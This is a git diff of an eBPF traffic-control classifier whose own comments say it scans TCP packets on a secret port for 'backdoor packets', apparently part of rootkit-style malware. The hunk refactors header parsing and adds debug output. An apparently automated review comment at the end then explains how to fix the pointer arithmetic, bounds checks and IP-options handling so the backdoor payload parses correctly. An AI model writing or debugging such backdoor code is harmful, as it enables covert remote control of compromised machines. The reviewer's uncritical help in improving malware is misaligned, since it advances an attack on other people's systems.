diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c
index 8f3eca9..f2bed12 100644
--- a/src/ebpf/include/bpf/tc.c
+++ b/src/ebpf/include/bpf/tc.c
@@ -18,51 +18,55 @@ int classifier(struct __sk_buff *skb){
 //We are interested on parsing TCP/IP packets so let's assume we have one
 //Ethernet header
- struct ethhdr *eth_hdr = data;
- if ((void *)eth_hdr + sizeof(struct ethhdr) > data_end){
+ struct ethhdr *eth = data;
+ if ((void *)eth + sizeof(struct ethhdr) > data_end){
 bpf_printk("ETH\n");
 return TC_ACT_OK;
 }
- if(eth_hdr->h_proto != htons(ETH_P_IP)){
+ if(eth->h_proto != htons(ETH_P_IP)){
 //Not an IP packet
 bpf_printk("IP\n");
 return TC_ACT_OK;
 }
 //IP header
- struct iphdr *ip_hdr = (struct iphdr*)(data + sizeof(struct ethhdr));
- if ((void *)ip_hdr + sizeof(struct iphdr) > data_end){
- bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip_hdr, data, data_end);
+ struct iphdr *ip = (struct iphdr*)(data + sizeof(struct ethhdr));
+ if ((void *)ip + sizeof(struct iphdr) > data_end){
+ bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip, data, data_end);
 return TC_ACT_OK;
 }
- if(ip_hdr->protocol != IPPROTO_TCP){
+ if(ip->protocol != IPPROTO_TCP){
 bpf_printk("TCP\n");
 return TC_ACT_OK;
 }
 //TCP header
- struct tcphdr *tcp_hdr = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr));
- if ((void *)tcp_hdr + sizeof(struct tcphdr) > data_end){
+ struct tcphdr *tcp = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr));
+ if ((void *)tcp + sizeof(struct tcphdr) > data_end){
 bpf_printk("TCP CHECK\n");
 return TC_ACT_OK;
 }
 //We now proceed to scan for our backdoor packets
- __u16 dest_port = ntohs(tcp_hdr->dest);
+ __u16 dest_port = ntohs(tcp->dest);
 if(dest_port != SECRET_PACKET_DEST_PORT){
 bpf_printk("PORT CHECK\n");
 return TC_ACT_OK;
 }
- //Mark skb buffer readable and writable
- //bpf_skb_pull_data(skb, 0);
+ bpf_printk("Detected bounds: data:%llx, data_end:%llx", data, data_end);
+ bpf_printk("Detected headers: \n\teth:%llx\n\tip:%llx\n\ttcp:%llx\n", eth, ip, tcp);
- __u32 payload_size = ntohs(ip_hdr->tot_len) - (tcp_hdr->doff * 4) - (ip_hdr->ihl * 4);
- char* payload = (void *)(tcp_hdr + tcp_hdr->doff*4);
+ //Mark skb buffer readable and writable
+
+ __u32 payload_size = ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4);
+ bpf_printk("ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u\n", ntohs(ip->tot_len), tcp->doff*4, ip->ihl*4);
+ char* payload = (void *)(tcp + tcp->doff*4);
 if ((void*)payload + payload_size > data_end){
- bpf_printk("PAYLOAD CHECK\n");
+ bpf_printk("PAYLOAD CHECK, payload:%llx, payload_size:%llx, data_end:%llx\n", payload, payload_size, data_end);
 return TC_ACT_OK;
 }
+ bpf_skb_pull_data(skb, 0);
 bpf_printk("PAYLOAD size: %u\n", payload_size);
diff --git a/src/tc.o b/src/tc.o
index 54c02b5..9fb45e2 100644
Binary files a/src/tc.o and b/src/tc.o differ
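Review bot: The payload pointer on the new side, `char* payload = (void *)(tcp + tcp->doff*4);`, does arithmetic on a `struct tcphdr *`, so the offset is scaled by `sizeof(struct tcphdr)` and the following `data_end` comparison bounds-checks an address well past the real TCP payload; cast before adding, `char *payload = (void *)tcp + tcp->doff * 4;`. The TCP header is located at a fixed `sizeof(struct iphdr)` while `payload_size` subtracts `ip->ihl * 4`, so the two disagree for any packet carrying IP options, and the unsigned subtraction wraps when `tot_len` is smaller than the combined header lengths. `bpf_skb_pull_data(skb, 0)` is now called after all the checks; that helper invalidates previously verified packet pointers, so code after it (outside this hunk) presumably has to reload `data`/`data_end` and repeat the bounds checks before touching `payload`. The comment `//Mark skb buffer readable and writable` is now separated from the call it describes and should move down next to it. `classifier` starts before and continues past this hunk.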